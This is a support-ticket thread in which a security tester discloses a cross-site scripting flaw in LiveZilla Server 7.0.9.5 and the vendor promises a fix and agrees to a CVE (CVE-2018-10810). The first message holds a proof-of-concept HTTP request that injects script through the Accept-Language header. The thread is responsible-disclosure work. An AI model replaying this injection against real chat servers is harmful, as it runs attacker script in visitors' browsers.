LiveChat <7.0.9.5 Cross-Site Scripting

Ticket: 93482

Status: Closed




#6

1525766675
Okan Coşkun

Can i share Ticket History link with the CVE mitre for the approval of CVE-2018-10810 ?

2018-05-07 16:54 GMT+03:00 LiveZilla Support <help@livezilla.info>:

> Hallo Okan, > > Thanks for getting in touch with us. > > We have fixed the issue in the latest release. > > There's no CVE yet, feel free to create one. > > If you have any questions, do not hesitate to contact us. > > -- > Thank you for your interest in LiveZilla Live Support! > > Please don't hesitate to contact us if you have further questions. > > Best Regards > > > Patrick Keil > > > ............................................................ > ................................... > LiveZilla GmbH > Ekkehardstraße 10 > 78224 Singen Germany > > ............................................................ > ................................... > Geschäftsführer: Patrick Keil > USt.-Id.-Nr.: DE 266496706 > Registergericht: Freiburg HRB 703898 > > Powered by LiveZilla Help Desk Software [https://www.livezilla.net] > > [C3C8D0AD87BE] > > Would you like to give feedback? > https://chat.livezilla.net/feedback.php?tid=OTM0ODI_ > > Ticket History: > https://chat.livezilla.net/ticket.php?id=93482&hash=DE9C7230EA79&salt= > e98942058530ead9b4f481f4d54b1f17 > > [DE9C7230EA79] >
-- Okan COŞKUN *Güvenlik Testleri Uzman Yardımcısı*
T : +90 216 688 81 82
F : +90 216 688 81 83
M :+90 539 886 45 46
Biznet Bilişim A.Ş. Barbaros Mah. Sarkaç Sok. Ağaoğlu My Prestige N:1 K:15 D:127 34746 ATAŞEHİR / İSTANBUL <http://www.biznet.com.tr/>
<https://www.facebook.com/biznetbs> <https://twitter.com/BiznetBilisim> <https://plus.google.com/100804207363898447940/posts> <https://www.linkedin.com/company/2054345> www.biznet.com.tr
-- Bu mesaj ve ekleri, mesajda gönderildiği belirtilen kişi/kişilere özeldir ve gizlidir. Bu mesaj herhangi bir amaç için çoğaltılamaz, dağıtılamaz ve
yayınlanamaz. Mesajın gönderildiği kişi değilseniz, mesaj içeriğini ya da eklerini kopyalamayınız, yayınlamayınız ya da başka kişilere
yönlendirmeyiniz ve mesajı gönderen kişiyi derhal uyararak bu mesajı
siliniz. Şirketimiz, mesajın içeriğinin ve eklerinin size değişikliğe
uğrayarak veya geç ulaşmasından; gizliliğinin korunmamasından; virüs
içermesinden ve bilgisayar sisteminize verebileceği herhangi bir zarardan sorumlu değildir. This message and its attachments are confidential and intended solely for the recipient(s) stated therein. This message cannot be copied, distributed or published for any purpose. If you are not the intended recipient, please do not copy, publish or forward the information existing in the content and attachments of this message. In such case please notify the sender immediately and delete all the copies of the message. Our company shall have no liability for any changes in or late receiving of the message, loss of integrity and confidentiality, viruses and any damages caused in anyway to your computer system based on this message.

#5

1525701256
Patrick Keil

Hallo Okan,

Thanks for getting in touch with us.

We have fixed the issue in the latest release. 

There's no CVE yet, feel free to create one.

If you have any questions, do not hesitate to contact us.

-- Thank you for your interest in LiveZilla Live Support!
Please don't hesitate to contact us if you have further questions.
Best Regards
Patrick Keil
............................................................................................... LiveZilla GmbH Ekkehardstraße 10 78224 Singen Germany
............................................................................................... Geschäftsführer: Patrick Keil USt.-Id.-Nr.: DE 266496706 Registergericht: Freiburg HRB 703898

#4

1525673577
Okan Coşkun

Greetings,

Did you fix the issue on 7.1.0.0 version? And can you request a cve for the issue

Android için Outlook<https://aka.ms/ghei36> uygulamasını edinin

________________________________ From: Okan Coşkun <okan.coskun@biznet.com.tr> Sent: Thursday, April 5, 2018 12:41:06 PM To: help@livezilla.info Cc: faruk.unal@biznet.com.tr Subject: Re: [C3C8D0AD87BE] - Your message - LiveChat <7.0.9.5 Cross-Site Scripting

Can you request for cve

Faruk Unal Okan Coskun

Thanks in advance,

Android için Outlook<https://aka.ms/ghei36> uygulamasını edinin

On Thu, Apr 5, 2018 at 12:38 PM +0300, "LiveZilla Support" <help@livezilla.info<mailto:help@livezilla.info>> wrote:

Hallo Okan,

Thanks for bringing this to our attention.

We will provide a fix for this with the very next update 7.0.9.6.

If you have any questions, do not hesitate to contact us.

-- Thank you for your interest in LiveZilla Live Support!
Please don't hesitate to contact us if you have further questions.
Best Regards
Patrick Keil
............................................................................................... LiveZilla GmbH Ekkehardstraße 10 78224 Singen Germany
............................................................................................... Geschäftsführer: Patrick Keil USt.-Id.-Nr.: DE 266496706 Registergericht: Freiburg HRB 703898
Powered by LiveZilla Help Desk Software [https://www.livezilla.net]
Would you like to give feedback? https://chat.livezilla.net/feedback.php?tid=OTM0ODI_
Ticket History: https://chat.livezilla.net/ticket.php?id=93482&hash=C3C8D0AD87BE&salt=e98942058530ead9b4f481f4d54b1f17
-- Bu mesaj ve ekleri, mesajda gönderildiği belirtilen kişi/kişilere özeldir ve gizlidir. Bu mesaj herhangi bir amaç için çoğaltılamaz, dağıtılamaz ve
yayınlanamaz. Mesajın gönderildiği kişi değilseniz, mesaj içeriğini ya da eklerini kopyalamayınız, yayınlamayınız ya da başka kişilere
yönlendirmeyiniz ve mesajı gönderen kişiyi derhal uyararak bu mesajı
siliniz. Şirketimiz, mesajın içeriğinin ve eklerinin size değişikliğe
uğrayarak veya geç ulaşmasından; gizliliğinin korunmamasından; virüs
içermesinden ve bilgisayar sisteminize verebileceği herhangi bir zarardan sorumlu değildir. This message and its attachments are confidential and intended solely for the recipient(s) stated therein. This message cannot be copied, distributed or published for any purpose. If you are not the intended recipient, please do not copy, publish or forward the information existing in the content and attachments of this message. In such case please notify the sender immediately and delete all the copies of the message. Our company shall have no liability for any changes in or late receiving of the message, loss of integrity and confidentiality, viruses and any damages caused in anyway to your computer system based on this message.

#3

1522921266
Okan Coşkun

Can you request for cve

Faruk Unal

Okan Coskun

Thanks in advance,

Android için Outlook uygulamasını edinin

On Thu, Apr 5, 2018 at 12:38 PM +0300, "LiveZilla Support" <help@livezilla.info> wrote:

Hallo Okan,

Thanks for bringing this to our attention.

We will provide a fix for this with the very next update 7.0.9.6.

If you have any questions, do not hesitate to contact us.

-- Thank you for your interest in LiveZilla Live Support!
Please don't hesitate to contact us if you have further questions.
Best Regards
Patrick Keil
............................................................................................... LiveZilla GmbH Ekkehardstraße 10 78224 Singen Germany
............................................................................................... Geschäftsführer: Patrick Keil USt.-Id.-Nr.: DE 266496706 Registergericht: Freiburg HRB 703898
Powered by LiveZilla Help Desk Software [https://www.livezilla.net]
Would you like to give feedback?
https://chat.livezilla.net/feedback.php?tid=OTM0ODI_
Ticket History:
https://chat.livezilla.net/ticket.php?id=93482&hash=C3C8D0AD87BE&salt=e98942058530ead9b4f481f4d54b1f17
-- <http://www.biznet.com.tr/biznet-bilisim-hague-security-delta-uyesi/> Bu mesaj ve ekleri, mesajda gönderildiği belirtilen kişi/kişilere özeldir ve
gizlidir. Bu mesaj herhangi bir amaç için çoğaltılamaz, dağıtılamaz ve
yayınlanamaz. Mesajın gönderildiği kişi değilseniz, mesaj içeriğini ya da eklerini kopyalamayınız, yayınlamayınız ya da başka kişilere
yönlendirmeyiniz ve mesajı gönderen kişiyi derhal uyararak bu mesajı
siliniz. Şirketimiz, mesajın içeriğinin ve eklerinin size değişikliğe
uğrayarak veya geç ulaşmasından; gizliliğinin korunmamasından; virüs
içermesinden ve bilgisayar sisteminize verebileceği herhangi bir zarardan sorumlu değildir. This message and its attachments are confidential and intended solely for the recipient(s) stated therein. This message cannot be copied, distributed or published for any purpose. If you are not the intended recipient, please do not copy, publish or forward the information existing in the content and attachments of this message. In such case please notify the sender immediately and delete all the copies of the message. Our company shall have no liability for any changes in or late receiving of the message, loss of integrity and confidentiality, viruses and any damages caused in anyway to your computer system based on this message.

#2

1522921132
Patrick Keil

Hallo Okan,

Thanks for bringing this to our attention.

We will provide a fix for this with the very next update 7.0.9.6.

If you have any questions, do not hesitate to contact us.

-- Thank you for your interest in LiveZilla Live Support!
Please don't hesitate to contact us if you have further questions.
Best Regards
Patrick Keil
............................................................................................... LiveZilla GmbH Ekkehardstraße 10 78224 Singen Germany
............................................................................................... Geschäftsführer: Patrick Keil USt.-Id.-Nr.: DE 266496706 Registergericht: Freiburg HRB 703898

#1

1522847640
Okan Coşkun

Greetings,

We have identify XSS vulnerability on LiveZilla_Server_7.0.9.5. If a

malicious extension change Language of browser can run arbitary scripts on

victims page.

GET /chat/mobile/index.php HTTP/1.1

Accept: text/html, application/xhtml+xml, image/jxr, */*

*Accept-Language: ';alert(1);'en-GB,en;q=0.7,tr;q=0.3*

User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like

Gecko

Accept-Encoding: gzip, deflate

Host: 10.11.11.111

Connection: close

--
Okan COŞKUN
*Güvenlik Testleri Uzman Yardımcısı*
T : +90 216 688 81 82
F : +90 216 688 81 83
M :+90 539 886 45 46
Biznet Bilişim A.Ş.
Barbaros Mah. Sarkaç Sok.
Ağaoğlu My Prestige N:1 K:15 D:127
34746 ATAŞEHİR / İSTANBUL
<http://www.biznet.com.tr></http:>
<https://www.facebook.com/biznetbs> <https://twitter.com/BiznetBilisim>
<https://plus.google.com/100804207363898447940/posts>
<https://www.linkedin.com/company/2054345>
www.biznet.com.tr
--
<http://www.biznet.com.tr/biznet-bilisim-hague-security-delta-uyesi></http:>
Bu mesaj ve ekleri, mesajda gönderildiği belirtilen kişi/kişilere özeldir
ve gizlidir. Bu mesaj herhangi bir amaç için çoğaltılamaz, dağıtılamaz ve
yayınlanamaz. Mesajın gönderildiği kişi değilseniz, mesaj içeriğini ya da
eklerini kopyalamayınız, yayınlamayınız ya da başka kişilere
yönlendirmeyiniz ve mesajı gönderen kişiyi derhal uyararak bu mesajı
siliniz. Şirketimiz, mesajın içeriğinin ve eklerinin size değişikliğe
uğrayarak veya geç ulaşmasından; gizliliğinin korunmamasından; virüs
içermesinden ve bilgisayar sisteminize verebileceği herhangi bir zarardan
sorumlu değildir.
This message and its attachments are confidential and intended solely for
the recipient(s) stated therein. This message cannot be copied, distributed
or published for any purpose. If you are not the intended recipient, please
do not copy, publish or forward the information existing in the content and
attachments of this message. In such case please notify the sender
immediately and delete all the copies of the message. Our company shall
have no liability for any changes in or late receiving of the message, loss
of integrity and confidentiality, viruses and any damages caused in anyway
to your computer system based on this message.


To reply to this ticket, please send an email to support@livezilla.net with subject [DE9C7230EA79].



Powered by LiveZilla Live Chat Software